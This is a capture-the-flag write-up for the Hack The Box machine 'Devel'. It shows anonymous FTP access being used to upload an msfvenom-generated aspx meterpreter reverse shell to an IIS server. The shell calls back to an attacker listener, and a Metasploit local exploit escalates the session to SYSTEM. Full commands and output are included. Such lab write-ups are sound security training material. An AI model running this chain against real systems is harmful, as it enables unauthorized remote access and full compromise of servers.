HTB - Devel

9 minute read

Nmap scan result

Lets perform a nmap scan on the target IP,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sC -sV 10.10.10.5 -A        
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-02 11:59 EST
Nmap scan report for 10.10.10.5
Host is up (0.36s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds

Seems like there are two common services used by this machine IP

Enumeration

We can see that FTP Anonymous Login is enabled on this FTP service

21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)

By accessing anonymous login with username as anonymous and blank password,

┌──(kaliaidenpearce369)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

We are able to list its contents, looks like a web server

Lets visit the web service running on Microsoft IIS httpd 7.5

Image

Looks like the welcome.png image is from ftp directory

And searching exploits for IIS httpd 7.5 in searchsploit,

┌──(root💀aidenpearce369)-[/home/kali]
└─# searchsploit iis 7.5
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
Microsoft IIS 6.0/7.5 (+ PHP) - Mult | windows/remote/19033.txt
Microsoft IIS 7.5 (Windows 7) - FTPS | windows/dos/15803.py
------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Thats just some authentication bypass PoC and dos exploit

Gaining access

Since, our files for the webserver are inside the ftp directory which can be easily accessed by anonymous login

We can create a aspx reverse shell using msfvenom and place it inside the ftp directory to spawn it while loading the page

Creating the aspx reverse shell,

┌──(root💀aidenpearce369)-[/home/kali]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9876 -f aspx -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2860 bytes
Saved as: rshell.aspx

Uploading the reverse shell into the ftp directory,

┌──(kaliaidenpearce369)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> put rshell.aspx 
local: rshell.aspx remote: rshell.aspx
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
100% |**************************|  2897       16.34 MiB/s    --:-- ETA
226 Transfer complete.
2897 bytes sent in 00:00 (9.59 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-02-22  07:50PM                 2897 rshell.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

After uploading it into the directory lets configure our listener and make a request to http://10.10.10.5/rshell.aspx to spawn the reverse shell

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.6LHOST => 10.10.14.6
msf6 exploit(multi/handler) > set LPORT 9876
LPORT => 9876
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.6:9876 
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:9876 -> 10.10.10.5:49161 ) at 2022-03-02 12:49:06 -0500

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Privilege escalation

We can clearly see that we have SeImpersonatePrivilege privilege for the current user

This privilege will allow the current user to create process with other user’s privilege

We can use print spoofer/juicy potato priv esc attacks with this privilege, if the conditions are met

Watson is a windows local privilege escalation checker, where it fuzzes for all possible vulnerabilites to escalate the privileges

We could also check for LPE vulnerabilities using Watson but, that requires .NET compatibility on victim machine and we have to build the exe according to the .NET version

To check the .NET versions on the target machine,

meterpreter > shell
Process 1172 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

c:\windows\system32\inetsrv>dir c:\Windows\Microsoft.NET\Framework        
dir c:\Windows\Microsoft.NET\Framework
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of c:\Windows\Microsoft.NET\Framework

...

14/07/2009  04:37 ��    <DIR>          v1.0.3705
14/07/2009  04:37 ��    <DIR>          v1.1.4322
18/03/2017  01:06 ��    <DIR>          v2.0.50727
14/07/2009  06:56 ��    <DIR>          v3.0
14/07/2009  06:52 ��    <DIR>          v3.5
              18 File(s)        309.424 bytes
               7 Dir(s)   4.697.403.392 bytes free

c:\windows\system32\inetsrv>

Anyways thats going to take some time, instead of that we are going to use Local Exploit Suggester from metasploit which is almost similar to Watson

meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search local exploit suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 40 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 

Keep in mind that some of the results are false positive too

We have go through each one of these, until we gain access

msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ntusermndragover
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ntusermndragover) > show options 

Module options (exploit/windows/local/ntusermndragover):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.116.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x86


msf6 exploit(windows/local/ntusermndragover) > set session 2
session => 2
msf6 exploit(windows/local/ntusermndragover) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(windows/local/ntusermndragover) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Reflectively injecting the exploit DLL and running the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 3444 launched.
[*] Reflectively injecting the DLL into 3444...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:4444 -> 10.10.10.5:49176 ) at 2022-03-02 13:30:02 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRelabelPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
SeUndockPrivilege

Now we have gained privilege over the target machine

Looting the secrets,

meterpreter > shell
Process 272 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>cd C:\Users\
cd C:\Users\

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of C:\Users

18/03/2017  01:16 ��    <DIR>          .
18/03/2017  01:16 ��    <DIR>          ..
18/03/2017  01:16 ��    <DIR>          Administrator
17/03/2017  04:17 ��    <DIR>          babis
18/03/2017  01:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  09:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   4.697.284.608 bytes free

C:\Users>more C:\Users\babis\Desktop\user.txt
more C:\Users\babis\Desktop\user.txt
<USER FLAG>

C:\Users>more C:\Users\Administrator\Desktop\root.txt
more C:\Users\Administrator\Desktop\root.txt
<ROOT FLAG>